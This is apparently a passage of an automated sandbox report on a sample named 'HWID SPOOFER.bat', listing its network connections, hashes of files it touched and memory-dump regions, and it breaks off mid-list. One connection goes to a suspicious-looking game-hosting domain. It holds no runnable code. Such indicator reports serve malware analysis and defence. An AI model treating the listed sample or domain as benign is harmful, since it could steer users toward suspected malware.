US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.180.14:443 www.youtube.com udp
GB 142.250.178.22:443 i.ytimg.com tcp
US 8.8.8.8:53 100.43.176.185.in-addr.arpa udp
US 8.8.8.8:53 14.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
GB 142.250.187.194:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 static.doubleclick.net udp
GB 216.58.213.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 142.250.200.42:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.42:443 jnn-pa.googleapis.com udp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 6.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 194.187.250.142.in-addr.arpa udp
GB 142.250.187.194:443 googleads.g.doubleclick.net udp
GB 142.250.178.22:443 i.ytimg.com udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.46:443 play.google.com udp
GB 172.217.169.46:443 play.google.com tcp
GB 172.217.169.46:443 play.google.com udp
BG 185.176.43.100:80 cod-fr.mygamesonline.org tcp
US 8.8.8.8:53 yt3.ggpht.com udp
GB 142.250.180.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp

Files

\??\pipe\crashpad_1404_KCIOIBTCWWDEOEOA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4288-138-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-139-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-140-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-150-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-149-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-148-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-147-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-146-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-145-0x000001E885880000-0x000001E885881000-memory.dmp

memory/4288-144-0x000001E885880000-0x000001E885881000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 15e5182933ec59e8dd3ef9ed8faa9c41
SHA1 c0a0f4e02c99aefe320aad96a4f0b01e15917c59
SHA256 83a251345fefb108fbc9889d3cbcb8eb8548cad23124653736017258b11036a4
SHA512 32dd58609f18e97f8b18945bebb60ea6081ad27c4aff32c5f4cee6da78fcde58a90a3b4f8faa9a25ca34ea0b62fd6810123d983caed4fdc612c7a0a1e0cf6cfd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7b193025d8d8b51aa163cce2f2d39cb3
SHA1 545f159d0625390b3999ddb901f83afbb95f4f58
SHA256 1c2e70c76520ce48a76bc879fb1b01be9dad97406b8b0b4bb916ecae92426a2c
SHA512 d476ac4e26f3bc71525274ea3c5e419432136155602c7e3710eee146efa3cc4d40bc86198ab8725dbc12d0a42ce30a1ebf97d4146c98a5f5f3a8eaa2a5f0c37f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6653aeb49c97dabf6bef01483d77ca77
SHA1 708a7da99da8ec428217dfaba58de62fae8abfc9
SHA256 47446ff3b2993062481b4c2d19bec4fefc001874c98169e2ab628b16cb290a34
SHA512 08976e67577b9d29c57157f618b0574f0b825e9ff47bd2eb4e371707244743148d82fdb071a048727906dc417a14add581fbf5560bae1cce10641ae26a8e34a7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dab03dc5dc41e8367848ec491b3869fc
SHA1 5531684f8e0353cc4f786ff6859c8ebd90a47461
SHA256 b596b25e527a94440dc23f2795859e5edfa6953aabed206ddff1f51ed076ca21
SHA512 09303eefc4392ce33171bb13d75cccec259f9000272c0cda43ef9f3b480537a756fbc6f6be6a50b6b0d31b0b421d31867e6031b5cec907ca6d5eaf130015635a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 efdf336c3d3a1adb92b2ad84b9e0ddf8
SHA1 d12684bf46d8efdc7fe65d72974a64f8cfc83aae
SHA256 a3b64fe67ea4be6fd1cad4f43ab347f08f3c05afd11552101ddc5f80fd3e31cc
SHA512 d47956132f95e0f8c31b0d8e8b23a7748b4fd39b6acf746e65600499bb6dac8bf3ba64843a090e41066de86eadd02aeb9c1ebd3ab9cdee4bd9d7867febbb696e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 4caf687e321205a2aded7e3ecb430379
SHA1 f2b9e1710467b22b1cc991732b05b07b8fef4732
SHA256 7d822d89c9f9d908040bd7208e57561ef442c513d8c3f0f18e5635daaf68a62a
SHA512 c79389fce00171a27e4fe338325a6c6777f7f4d49f6fab242977fdc6f9b6a4b766fa98c51f167a640a6b311415fcab0336bd1682f322d0b55773c6fc32ae3730

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 da98b804213d98efcf3276539f5c2d9b
SHA1 55e858cd306383cc5a6b2cf6bf17b27d7ca7b819
SHA256 6ca8c60fcb6693c16de82c6e0c234963c75102bd94f581cab153abaa43c28b14
SHA512 4fe1169412e5337688338113dc7c317e3f0e2d6ac164d1aa92b978233a40cab45b6c990b10da2c03e0c728a297d0803eb86689fe1532a24ab25100d07ff0380e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1bf02a99a613f21c6b01ed5bf292084f
SHA1 f90c30565709e9af307949bd3bd2d263b0eb13d7
SHA256 6cc461255058be4d343d8b1def16928027f92f3864fad7b049718cba703401cf
SHA512 3e268aa4e9c63222e6d6764645dd3685614315079547dd069bc18ff4f80eb5c43c3567af5a1223b838fc989ce951599e25959f153e61d435b70ecf9ce89164db

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 64dec461fa7aa8b9de596b9c7da9c4fa
SHA1 2bce3a42a76f77565b20f721f767154e950fc7df
SHA256 13f7a97469c6af48584239beb4d1965ca7f8be26930f0cdec8b632b8cf341f34
SHA512 95d018c267ff641d616fd9ee784cb8d97aebf5d484eb3baee7b31daa79711d80f6281fd2c7382a92f84e44f7728ecf6c563f0836a25cce85d49224a45a4d3582

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 34957b9733196bb5c0b543a1613b75c6
SHA1 659613dff3ccc20f36b5a008004c26c10381fb93
SHA256 173ef97e73e8e79cf2c64838c7045b136175a866a63f551ea0b443d9914951a2
SHA512 40ca2eb7131abb24ec654b923762d2613371a662102426d0e62c3715759a052021e9ecc38d6f91d3e927d8c49c2c34d7e4a4c9a5e57b2d768ea95b6bc1fa9d93

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

MD5 47b6e3b9a667b9dbc766575634849645
SHA1 54c7e7189111bf33c933817d0a97cefe61fe9a6d
SHA256 302ed4f6c8ac4312d71205603c4c28dd2976fafe4c05533c0a08ab3bdb531aa3
SHA512 a12b74ff45f6f9e6abf459863c299e1fafe61dcf2bea8a7331ed9547de14ed29e2deba69b104c6960db93b458f83ba6a4ba454c5514105e7ffb96da96e26e612

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

MD5 b23078951d91c38ad508e190a81517a4
SHA1 8dec45198f7dde8f6f30155817b7b03ef6eb570c
SHA256 8f951f1e047ce385bb4a999785def042031f72f3039ea096c677393bfa918749
SHA512 18da7c34c40298ebaefc6ced9b0b4769181addc85f192f258c70ac98b0275119a4e6f1aa938ed779fb73c9037036224a8b07dea403b9a5071996f2e3fa759e0c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008

MD5 357b4145c3264fe69f8c412e823adeed
SHA1 5fcaf1043bb72dbc719ce56a173b3da59db7ebc9
SHA256 4bf695f9d9be4d4e815594d2b7443042ec14e4dcbaa6d35031cc0420b8009410
SHA512 974c8b0220e6490324f5eda5590d4a895d7d67b87414ca1124dd01ac92e3bec033623bec67b4441fd6b69bb9034d4ee8210ee0f92fdf0a8efb6546e62ef8f7fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014

MD5 4f462ea90211a0170c0fac3187824858
SHA1 f90cc1b6f82e5f07739bd91b2b363e83716c826a
SHA256 c61a598483428c78349280e539bab7ae8c19ffdbe31b1c7cbd98c3a4e4a129b7
SHA512 f02a268d985f856d97df4eec61e9e16bcaa53a3bb068499723c996813afb6c93e7e980489126b21f720b580a69356001fc0c20e1337ad1f53c91071de0211776

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 cf6ccbba4ddd3985a0a733f3f365e1e8
SHA1 81b52220ab69c9c0f29fbeb1094a13b67ef9e1b6
SHA256 97b76382482e3716e291baae68fb13d6131abe591925150ad30a973c4d35fce2
SHA512 994dcd797e496927b1ccf42a4e351472fe672d269e6f6eb7b7896fb62fda7367c99eba5b15db7ab84b0a09e4199fa002bfb1b4a38324a20a463aff1c35697214

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 76badb7b79489127342df730484a51bd
SHA1 2fbddeeb42ead03085f851955e35bdfb886a88a0
SHA256 a585c7d804b80df0376ee79a70978f32ba8e9fbb757f2dc8d48dce79bb64868a
SHA512 323ac85fdb54e77dd4548e76023419c18f5902942a5a861ce5b85b7acd8e901d7768049a228ba1e6957214b25172bfb0bc611a2a151990647e44993fd9866839

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

MD5 082ea42c1aae3b695989f4b6f6eb0dc7
SHA1 1918fc9585b161ce79c29ff6d2fec39e526a3aa2
SHA256 d87bcc1cb0e666b8812da126e6e308529997c88176123920942b43efade7bc77
SHA512 e6c7b496139c95c43e9af3fbd3b6b4a90a206506a3f823c7003fc42585a404e0323ef85ed6233ac208c066ec528857a8609c36ec6c749cec0702149de2c6f69b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

MD5 0f3de113dc536643a187f641efae47f4
SHA1 729e48891d13fb7581697f5fee8175f60519615e
SHA256 9bef33945e76bc0012cdbd9941eab34f9472aca8e0ddbbaea52658423dc579f8
SHA512 8332bf7bd97ec1ebfc8e7fcf75132ca3f6dfd820863f2559ab22ac867aa882921f2b208ab76a6deb2e6fa2907bb0244851023af6c9960a77d3ad4101b314797f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

MD5 4b9d6adcec4cd72d94fa6875394d8167
SHA1 ea5ed417b6b5c61bf4181b28c0e2298039447adc
SHA256 1478f3842dec33cdf82627e9d06d468cbcd33d9af6c9309715012387a35cc606
SHA512 2be25e8df010b409ba6ec223530169b6502e95057da674e1456b870e5b42b63ad402def45c96bb982c9acc7202547cb3602f68920ee096db93e9f535efd53a03

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

MD5 4bc7fdb1eed64d29f27a427feea007b5
SHA1 62b5f0e1731484517796e3d512c5529d0af2666b
SHA256 05282cd78e71a5d9d14cc9676e20900a1d802016b721a48febec7b64e63775f6
SHA512 9900aecac98f2ca3d642a153dd5a53131b23ceec71dd9d3c59e83db24796a0db854f49629449a5c9fe4b7ca3afcdd294086f6b1ba724955551b622bc50e3ba1e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

MD5 b61b5eac4fb168036c99caf0190ec8d3
SHA1 8440a8168362eb742ea3f700bb2b79f7b0b17719
SHA256 3c495df6db16ed46f0f8a9aff100fa9b26e1434016c41b319f0c1009b7ab2e1f
SHA512 cbccd3aa5a1bdfddba5cc38956b5523a422a1151cdd0680336ab94f07aabecd1695062a0953c32c8209949ea6a4859c625c6deffe5108e8d5e48290017e51874

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001e

MD5 99592778c16a1dde4ec59f084b6cc2b8
SHA1 eec0231e700d38cdfd26bab4b9ac70e28c1e192a
SHA256 01b572e7283a3d9dc25922db1fb240977eb0acd2fe51838de8c91d248ee9094b
SHA512 c5fb7b13cbe295eab98881ebef31d5ef6df9cec0ee056918d0aaecdd593f27f228acc886434b6d600ec5934e68df87474b1c5bbb9391235c13c20e1ee9461e60

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c051a32ad0fe3061b98b8c51cad32216
SHA1 074c2a18565222bafe5ebf905fb204bc91c0338f
SHA256 6522e74bcca4018397d20a50ca14bef38c4bfc1e7f9247f08ed3eaef3ce95f30
SHA512 811fdfd77eb2e393c1775d1eeca6141a0f2267259cebda94656bdf35230dff94e8c954dc8dd1a4d543fb31a3ea0421fa8b2a621ff1fa1c865104f6510e979706

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 72c06df1ead39d1c85bf991f5e7e85b3
SHA1 08cb4d4de77f904edb160281113f5ce7cae6130e
SHA256 837c3daebb4b8c06194bef26f7ea0cbd9f77809757b5218c26ff1e5639bb59c5
SHA512 d579e431f39502304197103ca22ebb7dfbac4f4985a5d87d3508ce8ea8affc659f4803b26519c8ed32acf5522e7894eb2623d0fc1a6884f5299b72ad5b4b3061

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 9e84d960a0787f2fda9acf39a8ae6895
SHA1 f0f84cba2484380d8ffdeb24385e14cd75ea39c1
SHA256 995a5dd9fd944030a9321b869e6ddf871f97a1cf6f539623cef17bd8d8407876
SHA512 71118ab3337b41917fd14ce46267bd5c635559c19ec56ea7da291bdcf14d94e32dd49591eff34507322cde78cfe5cce9932d7014e25c60501c54bb90bdd22a3f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 692d23edb57b0903d38880ba6d5ecd82
SHA1 fc5cb0f78d2cd7083311a9621277480b8aec3cbc
SHA256 03609c7855a2cd23923c37548b842b2600fe339dc281e6048a43277c64f1cdf4
SHA512 fb7e84a7603379b73ffa33cc76a4047d9ac7020a688bb3dc424f966d8862e6df86c7433bbd1e92eb12e4d92ab03cd2fb4c42dd53fe199165fa5a13fc88068dfe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58c946.TMP

MD5 4f404d74f87e83ca9b6bb267c2f28519
SHA1 fc283403a1d385fc3672f569129e1f7777b24dd0
SHA256 444b2f26774e18dbab1ed1bcf9d3e9bd282774b28649f07d9c5b01243a74c7a2
SHA512 84b4df6ac360ceafc68021697131e3b5c207e17bcbb2f207c3ed4a0e5a8ff748b7c940812092af5b13b5e6125e7018e46d00e849121b92964fc492ce47a94f84

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 ad23e4a52eeccd7560b036c330c572ac
SHA1 fdcca9d5daea6d58758d56ec2ebdf689e7bdbd31
SHA256 7ae45fe584ce0e514f054390638675118566acc6f9b951f99f3a79e9336d36da
SHA512 b77a34c5c2874b9a8a2407166f4a1ffcfac46703a0a09d32595e96e47d0f9d12afa9c1010b68e0ad402df7261c8aa5d620cf217d734273f828eea671f57b2590

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 5a1c3104ae2c0659cfbbfcd4015974dd
SHA1 7c335e6a71a951caedf9576a6cb12d5336898d55
SHA256 970cf53003b00db41819838e6588853466d490f924eb7246f8706bdaf8807e37
SHA512 80ef65d170ba1860cbf460d78796696b8180db2896622f36e9fc8f3f93ebb42863e8b75ad541662d3dd8290dece0aec1123fc6493cdce6d04f8a59cbe082b019

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 1b27c5f7e3133fbf493c799cbaef1ee4
SHA1 93aaf023ca8b6b71354a461b9db70440d2e69020
SHA256 9e7364f795c5d240ef8512f151804b39083612655e015c3b2d50129e952ae901
SHA512 0ca2c3bb20cc74fbba8d970a41fde09fa5c5430511942cd60f974807c884078d688a51ead9290d4ceb3654c2d69e2cd0a2f75416de71b3a89c8cd2a2df419126

C:\Users\Admin\Desktop\HWID SPOOFER\HWID SPOOFER.bat

MD5 84a90b369cdd8466c5a95378b993a846
SHA1 7d33c816e1fdf2a1b07af9fcd0f1a5ceb265aa66
SHA256 6f25b97de48b4febfd553f3754fbc7cb779634c91a0ba4439be581a1b6e884a2
SHA512 a66430ef2f2747149e6ad1e19f19055a77f311aeef8c4e3c9125712cc472fa9384cb11492def07d9a19e400a30902d30404d1258870298a384e9258114ac30b5

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mxceaofo.qeu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4980-728-0x0000016FEE5D0000-0x0000016FEE5F2000-memory.dmp

memory/4980-729-0x0000016FEE650000-0x0000016FEE694000-memory.dmp

memory/4980-730-0x0000016FEEAC0000-0x0000016FEEB36000-memory.dmp

memory/4980-731-0x0000016FEE5C0000-0x0000016FEE5C8000-memory.dmp

memory/4980-732-0x0000016FEE600000-0x0000016FEE610000-memory.dmp

memory/4980-733-0x0000016FEE610000-0x0000016FEE624000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 8d75ae33d8c60d468188cbf525cff9e9
SHA1 2a3dae1827c689e941dd05856522a4e889d6c5bb
SHA256 32cb948fa79780361a32063c5256b7fd947c56e6c776485a3d30a153dcbfe8fc
SHA512 d8ac16b6dca3df9dd80f73bf74f9022a726a454396abd586b0b4757f006b86cf6131fb75a25b2e527817f8551ebefc6e6919a55cc1757c06cf0b2b260adb4e39

memory/3112-754-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

memory/3112-753-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-752-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-764-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-763-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-762-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-761-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-760-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

memory/3112-759-0x000001B6190F0000-0x000001B6190F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f8a4d1a1093f23aea2d2f4ce51ce7077
SHA1 e5fbc866cfb442b957b99d27fd57d1b120a4abc9
SHA256 3aba910a23dcf447c9201f274dd12cca6c3b846409538d62a17ae66f77de219a
SHA512 77804b673225393c3acadeffe45d858c8bdb82ae46326651f47d6e7666aa1fdf4763c861073f49b81c6d996d2a95755619b101c3520c7b4bed04f17dd8b488df

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 dd72642a2cca22190ec246a0ee32e15e
SHA1 3cd7b24f387838f8b5864a3a039d782798f2db51
SHA256 e37bf110a4331fa4b06b501542b09333e15bb07684f7d0edef18dc92677ee470
SHA512 2a155bb07bbf35afbd9813943fff5f38503fb9fb274a07b19971741569a4cc56a24ac4961a39c6f43979856c237bd91e84b4d951a82d7fa4c90080e87e5f68f4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 a26df49623eff12a70a93f649776dab7
SHA1 efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512 e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f89b28622767f7d67172b67b940ac6c3
SHA1 4d25b1962ef06e7fa24a839b2800dcd0138811c6
SHA256 39c19c98bbcaf5cca9583584637b81e8ac1af53482c3a29131c406fce23a6460
SHA512 7133b22b14b38934b1693a5dcff3cb9878a80d8ee86c483ecc042247d22ba93baa0e60a9f2f63702db9ba3ae70f104f86b54cb1d2d202bcb268d972ab057018e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c07d8fc5ab0191c26d434a017eedab24
SHA1 754be75fd3768fdb57c64904033838ec9ebf8b93
SHA256 452a8a3c32083e4f317e22ae32df9005a2579400336b0d97e382ea28806a0407
SHA512 a80091bf114beec043b0eaf873f137077d24a3a6eefd8fc6ce666a3445efa0dba2a9df483b406a11e370b1f2e7ec34a695904d19cd38bff30f6711df22e60617

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 84dd2936fe5f3ffccb23fa8c963e051c
SHA1 edcfbf039944a223f73ad8ba789c745fe40a07e1
SHA256 9ab859ce1aef514e068f9c3831ab91504364c7c080e7fa73ce0486a27161cc6d
SHA512 a259b199d16d337286b9f752e3fc45c20249174a57e883afc31095a33bd759f7df7576a4ea67c0d98815cde331ffbe431b2ecab27297963ede74c8803455f220

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 258602281cfb62b4a14fd510d2e78ab7
SHA1 d82950e02f57ea4b743142445954933ba2304457
SHA256 6b749897ebabd2fead120b4f5f101c4c8828aefa727fd5a1058faecd9c4cd1fc
SHA512 29163a34a426e3f7e37e24937333fba5da455e94ada042062fa9a691289dad5ffed590cfd4211cdbe15036d1c53a15e381d3e6073e333db6b2d85469b3b48044

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001a

MD5 1ec8fb7f6fd9050ab7c803cab2b0b48f
SHA1 6b831a02f8daed957b82c310cf867aa3e77b9816
SHA256 4345ede1557a49c9322e84fcfe2a20821e47003c2b3c214de6ba6d5d42bac73f
SHA512 d4ef769640f071121d07f8942533c7cfbaf4e4a29476d8977fb31d462e986246278fd599b2cb4344713f5ade2b89faed5c728093e31848c9e428601f0ea2f871

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\2504af4177af1958_0

MD5 0b1f454ee6b555edeed59f84cf549ec1
SHA1 0b0e8ee01a99c712246ecff94562a2c51bb0ba22
SHA256 543af62c243452dd12897eb38ec0ecda184c054dd629aa3fdb47a69475090664
SHA512 16b4354136b5a41a7424718ef5b9d3440e10f1c6beef636b8a7fe8dbea6c0060a7f8948a311d8706d9f3ea5e80b1c0e12b35ff2d5a0fbacf5aebfef81c94b9b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c

MD5 8f41323683bb7d3ecb4b8decba29cefa
SHA1 95cb350f4bdb10839b4c3e9f9c5b8e87bb2e31a4
SHA256 c8b731ae3961dd30885a72f256d10eaa6e53bd021e8350e8627d207332c43f18
SHA512 ad881da39c9d5d49bdf434cc41195786e78d4f5a3dbc2bdd2241f9825c750c5df7a0b7e878c608fe76f829e74254503e8676a6ae2767af9f9cebd599a78f4368

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001b

MD5 7e31349edb2d672ad1471eeacb22d480
SHA1 073473ae8f14482e8d0c512ac8059fe9f7fec249
SHA256 fab7b34e47ce70dc148dc87c28e4dab7ce7cc116a4507ea391ab7e7c550aafaa
SHA512 6ed50dff38bdc2d61319bbd2cb10eba20c2a1855c8e7aa085329aee87cce828f0baa1e4d7145d94413896e85ede798e4d8ddfba39fb0cd63a8e2def26ccd857f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\81037e226035aa29_0

MD5 6fcfa4342cfcb423ff255c657539765f
SHA1 187f3ed5aeb374c4332770d2769de0fb36da523c
SHA256 0cc9c9d11146944e7bfc9f2db4b7e6b634985c1ffc99d187be8762ecf14ecaf6
SHA512 bcfff721d58ac45137f126c8c377674fc56bd5428c0a8017f8608ca71fc56c50b2ac970712765c350c0bc0008e61f02ce2b8e5eac289157ac0a58b701754114b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 aa4459148de0e2a890e444b25a9ef422
SHA1 b65c5bb6120ccf75360c865e292d20fa011ee3b3
SHA256 04e4a8abf701be4f7eebc6198a5f53af9617deac34b8f0e334960679635b1706
SHA512 383ba1c8d1ff47db833040ab9beaca46819070c91be8f0694b846bc27e6ff00553cb86465a2ef27252e7bb75d9061b60f2e0b3515c8b8aa21bf7bd82121f2fda

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\0c8543dedcb7ccd1_0

MD5 9adedc6784f6e94831ab989143db41cf
SHA1 2896072ca534bc62f1ae757d9d5f985170a28b8e
SHA256 566eb82444c822cfbe4a4c22f31b61204de0e8bc850c849f3dcc6bf774a8a2cd
SHA512 91a468df7f7e7f1cbf335603303671bbcb9eec7af38807993e2be49db3a5bf6abe0edbbb164c60fd87e208dea262ca66d70d47979e81ae65dddb78e164a1cb48

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\890341016b4cb769_0

MD5 cf02d244673f6aa29ff2cf38cdb46260
SHA1 fda6594c1e389f8002a2ddf9ff41e6342d90e07b
SHA256 8ecc720dfc16b90b7c23265d76095dc8c8f1a7f6156eb1db6feb131d39ef7b9a
SHA512 57f6bcf41fd1d8008c5f3e04a522027bb60c24ae4851116f6cec94c1cdad2b67dad4b1ed72d969515f4b883e6549722e37932b557a5478d18c2c177b6f22b38a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3ea857d7190276a0_0

MD5 4b57cc90b422beeeefa05185ba8fd7bd
SHA1 0cdea5572d9220ac62ba5af82973a583ab010161
SHA256 c45e0c1b4e1251c6eec2f2cedc8daecd0f9465daa26166c4c1003f052a0dd128
SHA512 888de10eaffeff8f3a25e8633380a49d4a02090e19f79e8a84fa8ca43f689c756e895bc432b2e0a43554a3076c67792a06ae5dc99a17bd433ae15a85ae50c687

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\997d66cf2e10a48e_0

MD5 302891beed03f82b535c06271ed0e87f
SHA1 eea939b5130245f0c66612c3d77afa97d385fda6
SHA256 6eb2a039905b479b303638bac6fd59a37263522029f39a9c9b908dcee9328f34
SHA512 76ec12b3f76a292e0fb7f2aa821e8da0f629c2431583bc5b884b25f71ac2ba7144f461b13c69400fda4999948700da1f45ee26d85d6f3dc0b626741837107cd7

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\3c1b71d6c92f4ff2_0

